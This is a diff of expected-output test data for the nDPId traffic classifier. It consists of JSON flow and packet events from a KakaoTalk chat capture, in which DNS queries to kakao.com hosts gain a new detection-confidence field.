 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1430069022007,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":78,"pkt_l4_len":42,"ts_msec":1430069022007,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD4AAEAAQBHSHgoYUrwKvAEB4dgANQAqGG9RAgEAAAEAAAAAAAAGa2F0YWxrBWtha2FvA2NvbQAAAQAB"}
-00745{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022007,"flow_last_seen":1430069022007,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1430069022007,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"katalk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022007,"flow_last_seen":1430069022007,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1430069022007,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"katalk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1430069022041,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":136,"pkt_l4_len":100,"ts_msec":1430069022041,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHgb0gAANREBEwq8AQEKGFK8ADWLEwBk4PlpeoGAAAEAAwAAAAAHYWMtdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAABZUADQdhYy10YWxrAmdswBTALwABAAEAAACbAARuTI1wwC8AAQABAAAAmwAEAckAJw=="}
-00762{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1430069022041,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"ac-talk.kakao.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.112"}}
+00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022006,"flow_last_seen":1430069022041,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1430069022041,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"ac-talk.kakao.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.112"}}
 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1430069022041,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":114,"pkt_l4_len":78,"ts_msec":1430069022041,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGIb0wAANREBKAq8AQEKGFK8ADWWMABOrZ2G7YGAAAEAAgAAAAAEYXV0aAVrYWthbwNjb20AAAEAAcAMAAUAAQAABccACgRhdXRoAmdswBHALAABAAEAAABWAATSZ\/AP"}
-00759{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1430069022041,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"auth.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}}
+00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1430069022041,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"auth.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}}
 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1430069022042,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":166,"pkt_l4_len":130,"ts_msec":1430069022042,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAJbtdwAANREvTwq8AQEKGFK8ADXh2ACCeK5RAoGAAAEABQAAAAAGa2F0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAD9AAMBmthdGFsawJnbMATwC4AAQABAAAAegAEbkyOIsAuAAEAAQAAAHoABAHJAD3ALgABAAEAAAB6AAQByQA\/wC4AAQABAAAAegAEbkyNJQ=="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1430069022042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"katalk.kakao.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.142.34"}}
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022007,"flow_last_seen":1430069022042,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1430069022042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"katalk.kakao.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.142.34"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022058,"flow_last_seen":1430069022058,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1430069022058,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1430069022058,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":84,"pkt_l4_len":48,"ts_msec":1430069022058,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEQAAEAAQBHSGAoYUrwKvAEBo7UANQAwrR37RAEAAAEAAAAAAAAHYm9va2luZwRsb2NvBWtha2FvA2NvbQAAAQAB"}
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022058,"flow_last_seen":1430069022058,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1430069022058,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"booking.loco.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022058,"flow_last_seen":1430069022058,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1430069022058,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"booking.loco.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1430069022059,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"ts_msec":1430069022059,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBMmwANQAtbIX3UQEAAAEAAAAAAAAEdXAtbQR0YWxrBWtha2FvA2NvbQAAAQAB"}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-m.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-m.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1430069022059,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069022059,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwAAEAAQBHSIAoYUrwKvAEB5boANQAoZpVNewEAAAEAAAAAAAAEaXRlbQVrYWthbwNjb20AAAEAAQ=="}
-00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"item.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022059,"flow_last_seen":1430069022059,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1430069022059,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"item.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1430069022093,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":114,"pkt_l4_len":78,"ts_msec":1430069022093,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGIb1QAANREBJgq8AQEKGFK8ADXlugBOjwdNe4GAAAEAAgAAAAAEaXRlbQVrYWthbwNjb20AAAEAAcAMAAUAAQAABdUACgRpdGVtAmdswBHALAABAAEAAADUAATSZ\/AP"}
-00760{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1430069022093,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"item.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}}
+00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1430069022093,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"item.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}}
 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1430069022094,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":124,"pkt_l4_len":88,"ts_msec":1430069022094,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGzteAAANREveAq8AQEKGFK8ADUybABYuHj3UYGAAAEAAgAAAAAEdXAtbQR0YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAD8wAPBHVwLW0EdGFsawJnbMAWwDEAAQABAAAAeAAE0mfwEA=="}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069022094,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-m.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022094,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1430069022094,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":12908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-m.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.16"}}
 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1430069022094,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"ts_msec":1430069022094,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHLteQAANREvcQq8AQEKGFK8ADWjtQBeT7D7RIGAAAEAAgAAAAAHYm9va2luZwRsb2NvBWtha2FvA2NvbQAAAQABwAwABQABAAAD8wASB2Jvb2tpbmcEbG9jbwJnbMAZwDQAAQABAAAAeAAEbkyOfQ=="}
-00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1430069022094,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"booking.loco.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.142.125"}}
+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1430069022094,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"booking.loco.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.142.125"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022100,"flow_last_seen":1430069022100,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022100,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1430069022100,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"ts_msec":1430069022100,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEBFykANQAtVi4l7AEAAAEAAAAAAAAEdXAtcAR0YWxrBWtha2FvA2NvbQAAAQAB"}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022100,"flow_last_seen":1430069022100,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022100,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-p.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022100,"flow_last_seen":1430069022100,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022100,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-p.talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022104,"flow_last_seen":1430069022104,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069022104,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":9094,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
